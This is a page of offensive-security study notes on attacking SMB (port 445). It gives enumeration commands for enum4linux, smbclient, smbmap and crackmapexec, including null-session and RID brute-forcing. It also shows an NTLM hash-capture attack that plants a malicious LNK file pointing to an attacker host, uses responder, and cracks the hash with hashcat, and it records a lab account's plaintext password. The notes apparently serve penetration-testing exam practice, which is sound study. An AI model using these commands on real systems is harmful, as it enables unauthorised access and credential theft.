Offensive Security Notes
  • OSCP Checklist
    • Privilege Escalation Windows
  • Menu
    • Services
      • Remote Desktop (RDP) (3389)
      • FTP (21)
      • Telnet (23)
      • SMTP (25)
      • HTTP/HTTPS (80/443)
        • OWASP TOP 10 (2017)
      • Kerberos (88) / Active Directory (AD)
      • NetBIOS (139)
      • Samba / SMB (445)
      • IMAP (143/993)
      • MySQL / MariaDB (3389)
      • PostgreSQL (5432)
    • Vulnerability Methods
      • Padding Oracle Attack
      • Unsecure JSON Web Token (JWT)
      • XXE (XML External Entity)
      • LFI / RFI (Local / Remote File Inclusion)
      • CSRF (Cross-Site Request Forgery)
      • Session Fixation
      • SSRF (Server-Side Request Forgery)
      • Wildcard Injection
    • Tools of the Trade
      • powershell
      • hashcat
      • responder
      • OWASP Favicon DB
      • misc
      • meterpreter
      • Bloodhound
      • powerview
      • redis
      • wpscan
      • cewl
    • Walkthroughs
      • Try Hack Me
        • Attacktive Directory
      • OSCP Practice
        • Vector
        • Vault
        • QuarterJack
        • PayDay
        • Pelican
        • Postfish
        • Readys
Powered by GitBook
On this page
  • Enumeration
  • enum4linux
  • smbclient
  • smbmap
  • crackmapexec
  • with valid account
  • Exploitation
  • URI File Attack
  1. Menu
  2. Services

Samba / SMB (445)

Enumeration

enum4linux

enum4linux-ng -A $IP #run both enum4linux -A $IP

smbclient

smbclient -L 10.10.113.122 -U 'svc-admin' -p

smbclient //192.168.139.157/fox -U 'fox' -p

smbmap

smbmap -H 192.168.149.157 -u 'fox' -p 'iparalipomenidellabatracomiomachia'

crackmapexec

crackmapexec smb $target gives some initial info

crackmapexec smb $target -u '' -p '' # try a null session

crackmapexec smb $target -u 'guest' -p '' # can sometimes get some info

with valid account

crackmapexec smb $target -u $user -p $pass --shares

crackmapexec smb $target -u $user -p $pass -M spider_plus

crackmapexec smb $target -u $user -p $pass --rid-brute # may show other accounts

Exploitation

URI File Attack

If you can upload files to an SMB share, the files may render their icons. If this is an Active Directory computer, then you may be able to capture the NTLM hash during the icon loading attempt.

sudo responder -I tun0 -v

python2 /home/kali/tools/win/LNKUp/generate.py --host 192.168.49.187 --type ntlm --output link.lnk

You should now have the NTLMv2 hash which you can crack through hashcat (-m 5600).

PreviousNetBIOS (139)NextIMAP (143/993)

Last updated 3 years ago